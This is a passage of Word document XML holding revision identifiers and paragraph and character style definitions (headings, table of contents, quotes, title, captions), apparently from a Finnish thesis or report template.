    <w:rsid w:val="00D36EC9"/>
    <w:rsid w:val="00D375F9"/>
    <w:rsid w:val="00D421E4"/>
    <w:rsid w:val="00D427B2"/>
    <w:rsid w:val="00D514DD"/>
    <w:rsid w:val="00D54DFF"/>
    <w:rsid w:val="00D559EE"/>
    <w:rsid w:val="00D56F7E"/>
    <w:rsid w:val="00D814C2"/>
    <w:rsid w:val="00D87DAF"/>
    <w:rsid w:val="00D92E1E"/>
    <w:rsid w:val="00D9587E"/>
    <w:rsid w:val="00D97E96"/>
    <w:rsid w:val="00DA02ED"/>
    <w:rsid w:val="00DA1517"/>
    <w:rsid w:val="00DA2F6E"/>
    <w:rsid w:val="00DA3470"/>
    <w:rsid w:val="00DA4D86"/>
    <w:rsid w:val="00DA75DE"/>
    <w:rsid w:val="00DB5251"/>
    <w:rsid w:val="00DB6A5E"/>
    <w:rsid w:val="00DC0236"/>
    <w:rsid w:val="00DC4F04"/>
    <w:rsid w:val="00DC746A"/>
    <w:rsid w:val="00DD0A8A"/>
    <w:rsid w:val="00DE6469"/>
    <w:rsid w:val="00DF4DA4"/>
    <w:rsid w:val="00DF63F3"/>
    <w:rsid w:val="00DF7A20"/>
    <w:rsid w:val="00E00598"/>
    <w:rsid w:val="00E02A90"/>
    <w:rsid w:val="00E07D45"/>
    <w:rsid w:val="00E07FDE"/>
    <w:rsid w:val="00E10B13"/>
    <w:rsid w:val="00E16311"/>
    <w:rsid w:val="00E21491"/>
    <w:rsid w:val="00E22821"/>
    <w:rsid w:val="00E24C7B"/>
    <w:rsid w:val="00E2634B"/>
    <w:rsid w:val="00E26ADF"/>
    <w:rsid w:val="00E35977"/>
    <w:rsid w:val="00E3699E"/>
    <w:rsid w:val="00E36D33"/>
    <w:rsid w:val="00E41DA2"/>
    <w:rsid w:val="00E423C9"/>
    <w:rsid w:val="00E46C63"/>
    <w:rsid w:val="00E47B26"/>
    <w:rsid w:val="00E50D8B"/>
    <w:rsid w:val="00E521E9"/>
    <w:rsid w:val="00E54669"/>
    <w:rsid w:val="00E633FD"/>
    <w:rsid w:val="00E674B5"/>
    <w:rsid w:val="00E730B7"/>
    <w:rsid w:val="00E73365"/>
    <w:rsid w:val="00E73E75"/>
    <w:rsid w:val="00E745F5"/>
    <w:rsid w:val="00E82901"/>
    <w:rsid w:val="00E86736"/>
    <w:rsid w:val="00E868F1"/>
    <w:rsid w:val="00E970C7"/>
    <w:rsid w:val="00E97CA7"/>
    <w:rsid w:val="00E97D52"/>
    <w:rsid w:val="00EA630B"/>
    <w:rsid w:val="00EC2013"/>
    <w:rsid w:val="00EC40AD"/>
    <w:rsid w:val="00EC4BEA"/>
    <w:rsid w:val="00EC5177"/>
    <w:rsid w:val="00EC619A"/>
    <w:rsid w:val="00EC708B"/>
    <w:rsid w:val="00ED213A"/>
    <w:rsid w:val="00ED3DB4"/>
    <w:rsid w:val="00ED7B66"/>
    <w:rsid w:val="00EE0365"/>
    <w:rsid w:val="00EF2CE0"/>
    <w:rsid w:val="00EF407A"/>
    <w:rsid w:val="00EF4BAB"/>
    <w:rsid w:val="00EF75D2"/>
    <w:rsid w:val="00EF7901"/>
    <w:rsid w:val="00EF7B0E"/>
    <w:rsid w:val="00F0080E"/>
    <w:rsid w:val="00F0229E"/>
    <w:rsid w:val="00F02C17"/>
    <w:rsid w:val="00F04E34"/>
    <w:rsid w:val="00F15461"/>
    <w:rsid w:val="00F16D1C"/>
    <w:rsid w:val="00F222D4"/>
    <w:rsid w:val="00F22898"/>
    <w:rsid w:val="00F2347E"/>
    <w:rsid w:val="00F23B87"/>
    <w:rsid w:val="00F25C24"/>
    <w:rsid w:val="00F26E58"/>
    <w:rsid w:val="00F37D61"/>
    <w:rsid w:val="00F41B04"/>
    <w:rsid w:val="00F44502"/>
    <w:rsid w:val="00F54876"/>
    <w:rsid w:val="00F57D42"/>
    <w:rsid w:val="00F57E37"/>
    <w:rsid w:val="00F6264E"/>
    <w:rsid w:val="00F65EE7"/>
    <w:rsid w:val="00F71BA0"/>
    <w:rsid w:val="00F73BF4"/>
    <w:rsid w:val="00F811D3"/>
    <w:rsid w:val="00F91371"/>
    <w:rsid w:val="00F958AE"/>
    <w:rsid w:val="00F97AB7"/>
    <w:rsid w:val="00FA1DE4"/>
    <w:rsid w:val="00FB0572"/>
    <w:rsid w:val="00FB1FED"/>
    <w:rsid w:val="00FC1C42"/>
    <w:rsid w:val="00FC3779"/>
    <w:rsid w:val="00FC4266"/>
    <w:rsid w:val="00FC4B92"/>
    <w:rsid w:val="00FD606F"/>
    <w:rsid w:val="00FD618A"/>
    <w:rsid w:val="00FD77AE"/>
    <w:rsid w:val="00FE247C"/>
    <w:rsid w:val="00FE3270"/>
    <w:rsid w:val="00FE4624"/>
    <w:rsid w:val="00FF0A6E"/>
    <w:rsid w:val="00FF0C88"/>
    <w:rsid w:val="00FF275B"/>
    <w:rsid w:val="00FF4C28"/>
    <w:rsid w:val="00FF5EA6"/>
    <w:rsid w:val="0270FEF6"/>
    <w:rsid w:val="03A889E8"/>
    <w:rsid w:val="04509756"/>
    <w:rsid w:val="04E769ED"/>
    <w:rsid w:val="078370D4"/>
    <w:rsid w:val="09BADB10"/>
    <w:rsid w:val="114187BC"/>
    <w:rsid w:val="12DCC0A5"/>
    <w:rsid w:val="13C562BE"/>
    <w:rsid w:val="19D0FEDA"/>
    <w:rsid w:val="2068705F"/>
    <w:rsid w:val="21CA67D7"/>
    <w:rsid w:val="2496EAB3"/>
    <w:rsid w:val="251B9F07"/>
    <w:rsid w:val="2BB85BD7"/>
    <w:rsid w:val="32699F37"/>
    <w:rsid w:val="33D9BA6F"/>
    <w:rsid w:val="34708D06"/>
    <w:rsid w:val="3819A62C"/>
    <w:rsid w:val="3873B223"/>
    <w:rsid w:val="3C7B9EEB"/>
    <w:rsid w:val="3F17A957"/>
    <w:rsid w:val="461A1CEB"/>
    <w:rsid w:val="4ADCC9F7"/>
    <w:rsid w:val="4C789A58"/>
    <w:rsid w:val="4EB55D05"/>
    <w:rsid w:val="50BD266A"/>
    <w:rsid w:val="51701CC5"/>
    <w:rsid w:val="549DA05F"/>
    <w:rsid w:val="5A8CE8C6"/>
    <w:rsid w:val="5AE1B2EA"/>
    <w:rsid w:val="5E3D498D"/>
    <w:rsid w:val="60D42DA0"/>
    <w:rsid w:val="696E2496"/>
    <w:rsid w:val="698C1909"/>
    <w:rsid w:val="725ADB2B"/>
    <w:rsid w:val="73F6AB8C"/>
    <w:rsid w:val="744C91CE"/>
    <w:rsid w:val="763CD39D"/>
    <w:rsid w:val="79844860"/>
    <w:rsid w:val="7B452578"/>
    <w:rsid w:val="7E66A4D2"/>
    <w:rsid w:val="7EE12C34"/>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EE3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4"/>
        <w:szCs w:val="24"/>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 w:unhideWhenUsed="1" w:qFormat="1"/>
    <w:lsdException w:name="table of figures" w:semiHidden="1" w:uiPriority="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semiHidden="1" w:uiPriority="19"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locked="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unhideWhenUsed="1" w:qFormat="1"/>
    <w:lsdException w:name="Bibliography" w:uiPriority="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51C"/>
    <w:pPr>
      <w:spacing w:after="480" w:line="360" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:color w:val="000000" w:themeColor="text1"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading1">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading1Char"/>
    <w:qFormat/>
    <w:rsid w:val="006E523B"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:numPr>
        <w:numId w:val="1"/>
      </w:numPr>
      <w:spacing w:before="480" w:after="360" w:line="240" w:lineRule="auto"/>
      <w:ind w:left="431" w:hanging="431"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorHAnsi"/>
      <w:b/>
      <w:noProof/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
      <w:lang w:val="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading2">
    <w:name w:val="heading 2"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading2Char"/>
    <w:qFormat/>
    <w:rsid w:val="006E523B"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:numPr>
        <w:ilvl w:val="1"/>
        <w:numId w:val="1"/>
      </w:numPr>
      <w:spacing w:after="360" w:line="240" w:lineRule="auto"/>
      <w:ind w:left="578" w:hanging="578"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:b/>
      <w:sz w:val="28"/>
      <w:szCs w:val="26"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading3">
    <w:name w:val="heading 3"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading3Char"/>
    <w:qFormat/>
    <w:rsid w:val="006E523B"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:numPr>
        <w:ilvl w:val="2"/>
        <w:numId w:val="1"/>
      </w:numPr>
      <w:spacing w:after="360" w:line="240" w:lineRule="auto"/>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="majorBidi"/>
      <w:b/>
      <w:noProof/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading4">
    <w:name w:val="heading 4"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading4Char"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00893194"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="240" w:after="240"/>
      <w:outlineLvl w:val="3"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:b/>
      <w:iCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading5">
    <w:name w:val="heading 5"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading5Char"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00F37D61"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:numPr>
        <w:ilvl w:val="4"/>
        <w:numId w:val="1"/>
      </w:numPr>
      <w:spacing w:before="40" w:after="0"/>
      <w:outlineLvl w:val="4"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:color w:val="A90452" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading6">
    <w:name w:val="heading 6"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading6Char"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00F37D61"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:numPr>
        <w:ilvl w:val="5"/>
        <w:numId w:val="1"/>
      </w:numPr>
      <w:spacing w:before="40" w:after="0"/>
      <w:outlineLvl w:val="5"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:color w:val="700336"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1"/>
      </w:numPr>
      <w:spacing w:before="40" w:after="0"/>
      <w:outlineLvl w:val="6"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="700336"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5D59"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorHAnsi"/>
      <w:b/>
      <w:noProof/>
      <w:color w:val="000000" w:themeColor="text1"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
      <w:lang w:val="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading2Char">
    <w:name w:val="Heading 2 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading2"/>
    <w:rsid w:val="00125D59"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:b/>
      <w:color w:val="000000" w:themeColor="text1"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="26"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading3Char">
    <w:name w:val="Heading 3 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading3"/>
    <w:rsid w:val="00125D59"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="majorBidi"/>
      <w:b/>
      <w:noProof/>
      <w:color w:val="000000" w:themeColor="text1"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading4Char">
    <w:name w:val="Heading 4 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading4"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00893194"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:b/>
      <w:iCs/>
      <w:color w:val="000000" w:themeColor="text1"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading5Char">
    <w:name w:val="Heading 5 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading5"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00F37D61"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:color w:val="A90452"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700336"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700336"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character" w:styleId="PageNumber">
    <w:name w:val="page number"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00B80541"/>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
      <w:sz w:val="22"/>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5D59"/>
    <w:rPr>
      <w:color w:val="000000" w:themeColor="text1"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Kuvailulehtinormaali">
    <w:name w:val="Kuvailulehti_normaali"/>
    <w:link w:val="KuvailulehtinormaaliChar"/>
    <w:rsid w:val="003D3422"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
      <w:color w:val="000000" w:themeColor="text1"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="20"/>
      <w:lang w:eastAsia="fi-FI"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="KuvailulehtinormaaliChar">
    <w:name w:val="Kuvailulehti_normaali Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Kuvailulehtinormaali"/>
    <w:rsid w:val="003D3422"/>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
      <w:color w:val="000000" w:themeColor="text1"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="20"/>
      <w:lang w:eastAsia="fi-FI"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00390AE8"/>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
      <w:color w:val="0D004C"/>
      <w:sz w:val="24"/>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next w:val="Normal"/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00D2427A"/>
    <w:pPr>
      <w:spacing w:after="360" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorHAnsi"/>
      <w:b/>
      <w:noProof/>
      <w:color w:val="000000" w:themeColor="text1"/>
      <w:szCs w:val="32"/>
      <w:lang w:val="en-US" w:eastAsia="fi-FI"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC1">
    <w:name w:val="toc 1"/>
    <w:basedOn w:val="Heading1"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00C11E9E"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="0"/>
      </w:numPr>
      <w:tabs>
        <w:tab w:val="left" w:pos="480"/>
        <w:tab w:val="right" w:leader="dot" w:pos="9214"/>
      </w:tabs>
      <w:spacing w:before="0" w:after="100" w:line="259" w:lineRule="auto"/>
      <w:outlineLvl w:val="9"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC2">
    <w:name w:val="toc 2"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00C11E9E"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="left" w:pos="709"/>
        <w:tab w:val="right" w:leader="dot" w:pos="9214"/>
      </w:tabs>
      <w:spacing w:after="100" w:line="259" w:lineRule="auto"/>
      <w:ind w:left="170"/>
    </w:pPr>
    <w:rPr>
      <w:noProof/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC3">
    <w:name w:val="toc 3"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="008C22D4"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="left" w:pos="1276"/>
        <w:tab w:val="left" w:pos="1783"/>
        <w:tab w:val="right" w:leader="dot" w:pos="9214"/>
      </w:tabs>
      <w:spacing w:after="100" w:line="240" w:lineRule="auto"/>
      <w:ind w:left="397"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TableofFigures">
    <w:name w:val="table of figures"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="1"/>
    <w:rsid w:val="00CA77C5"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="right" w:leader="dot" w:pos="9214"/>
      </w:tabs>
      <w:spacing w:after="100" w:line="259" w:lineRule="auto"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="LhteetOtsikko">
    <w:name w:val="Lähteet_Otsikko"/>
    <w:next w:val="Normal"/>
    <w:qFormat/>
    <w:rsid w:val="00974F3E"/>
    <w:pPr>
      <w:spacing w:before="480" w:after="360" w:line="240" w:lineRule="auto"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:noProof/>
      <w:color w:val="000000" w:themeColor="text1"/>
      <w:sz w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="IntenseQuote">
    <w:name w:val="Intense Quote"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="IntenseQuoteChar"/>
    <w:uiPriority w:val="30"/>
    <w:rsid w:val="003D3422"/>
    <w:pPr>
      <w:pBdr>
        <w:top w:val="single" w:sz="4" w:space="10" w:color="E2066E" w:themeColor="accent1"/>
        <w:bottom w:val="single" w:sz="4" w:space="10" w:color="E2066E" w:themeColor="accent1"/>
      </w:pBdr>
      <w:spacing w:before="360" w:after="360"/>
      <w:ind w:left="864" w:right="864"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:iCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Liitteet">
    <w:name w:val="Liitteet"/>
    <w:next w:val="Normal"/>
    <w:qFormat/>
    <w:rsid w:val="00BC1473"/>
    <w:pPr>
      <w:spacing w:after="360" w:line="240" w:lineRule="auto"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:noProof/>
      <w:color w:val="000000" w:themeColor="text1"/>
      <w:sz w:val="28"/>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tiivistelm">
    <w:name w:val="Kuvailulehti_tiivistelmä"/>
    <w:link w:val="KuvailulehtitiivistelmChar"/>
    <w:qFormat/>
    <w:rsid w:val="00100B3E"/>
    <w:pPr>
      <w:spacing w:before="60" w:after="60" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
      <w:color w:val="000000" w:themeColor="text1"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
      <w:lang w:eastAsia="fi-FI"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="KuvailulehtitiivistelmChar">
    <w:name w:val="Kuvailulehti_tiivistelmä Char"/>
    <w:basedOn w:val="KuvailulehtinormaaliChar"/>
    <w:link w:val="Kuvailulehtitiivistelm"/>
    <w:rsid w:val="00100B3E"/>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
      <w:color w:val="000000" w:themeColor="text1"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
      <w:lang w:eastAsia="fi-FI"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Caption">
    <w:name w:val="caption"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:rsid w:val="001A37F2"/>
    <w:rPr>
      <w:bCs/>
      <w:iCs/>
      <w:noProof/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Title">
    <w:name w:val="Title"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="CoverpageSubtitle"/>
    <w:link w:val="TitleChar"/>
    <w:qFormat/>
    <w:rsid w:val="00893194"/>
    <w:pPr>
      <w:spacing w:before="3120" w:line="240" w:lineRule="auto"/>
      <w:ind w:left="1276"/>
      <w:contextualSpacing/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:b/>
      <w:spacing w:val="-10"/>
      <w:kern w:val="28"/>
      <w:sz w:val="52"/>
      <w:szCs w:val="56"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="TitleChar">
    <w:name w:val="Title Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Title"/>
    <w:rsid w:val="00125D59"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:b/>
      <w:color w:val="000000" w:themeColor="text1"/>
      <w:spacing w:val="-10"/>
      <w:kern w:val="28"/>
      <w:sz w:val="52"/>
      <w:szCs w:val="56"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Subtitle">
    <w:name w:val="Subtitle"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="SubtitleChar"/>
    <w:uiPriority w:val="11"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00880298"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="1"/>
      </w:numPr>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125D59"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
      <w:color w:val="5A5A5A" w:themeColor="text1" w:themeTint="A5"/>
      <w:spacing w:val="15"/>
      <w:sz w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Quote">
    <w:name w:val="Quote"/>
    <w:next w:val="Normal"/>
    <w:link w:val="QuoteChar"/>
    <w:uiPriority w:val="29"/>
    <w:qFormat/>
    <w:rsid w:val="00560194"/>
    <w:pPr>
      <w:spacing w:after="360" w:line="240" w:lineRule="auto"/>
      <w:ind w:left="1304"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="000000" w:themeColor="text1"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="QuoteChar">
    <w:name w:val="Quote Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Quote"/>
    <w:uiPriority w:val="29"/>
    <w:rsid w:val="00560194"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="000000" w:themeColor="text1"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="FollowedHyperlink">
    <w:name w:val="FollowedHyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="008E6EC1"/>
    <w:rPr>
      <w:color w:val="7861A8" w:themeColor="followedHyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Kansilehtialanimi">
    <w:name w:val="Kansilehti_alanimi"/>
    <w:qFormat/>
    <w:rsid w:val="00CA1851"/>
    <w:pPr>
      <w:spacing w:before="240" w:after="240"/>
      <w:ind w:left="1276"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman" w:cs="Arial"/>
      <w:b/>
      <w:color w:val="000000" w:themeColor="text1"/>
      <w:sz w:val="36"/>
      <w:szCs w:val="36"/>
      <w:lang w:eastAsia="fi-FI"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Kansilehtitekij">
    <w:name w:val="Kansilehti_tekijä"/>
    <w:qFormat/>
    <w:rsid w:val="003D3422"/>
    <w:pPr>
      <w:spacing w:before="120" w:after="3240"/>
      <w:ind w:left="1276"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman" w:cs="Arial"/>
      <w:color w:val="000000"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
      <w:lang w:eastAsia="fi-FI"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="KansilehtiOpintotiedot">
    <w:name w:val="Kansilehti_Opintotiedot"/>
    <w:qFormat/>
    <w:rsid w:val="00CA1851"/>
    <w:pPr>
      <w:spacing w:before="60" w:after="60" w:line="240" w:lineRule="auto"/>
      <w:ind w:left="1276"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman" w:cs="Arial"/>
      <w:bCs/>
      <w:color w:val="000000"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
      <w:lang w:eastAsia="fi-FI"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="KuvailulehtiOtsikko">
    <w:name w:val="Kuvailulehti_Otsikko"/>
    <w:qFormat/>
    <w:rsid w:val="003D3422"/>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
      <w:b/>
      <w:color w:val="000000" w:themeColor="text1"/>
      <w:lang w:eastAsia="fi-FI"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Kuvailulehtitiedotkorostettu">
    <w:name w:val="Kuvailulehti_tiedot_korostettu"/>
    <w:qFormat/>
    <w:rsid w:val="008C3364"/>
    <w:pPr>
      <w:spacing w:before="240" w:after="240" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
      <w:b/>
      <w:color w:val="000000" w:themeColor="text1"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="20"/>
      <w:lang w:eastAsia="fi-FI"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:styleId="TableGrid">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="TableNormal"/>
    <w:uiPriority w:val="39"/>
    <w:rsid w:val="000F5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nseQuoteChar">
    <w:name w:val="Intense Quote Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="IntenseQuote"/>
    <w:uiPriority w:val="30"/>
    <w:rsid w:val="003D3422"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="000000" w:themeColor="text1"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseReference">
    <w:name w:val="Intense Reference"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="32"/>
    <w:qFormat/>
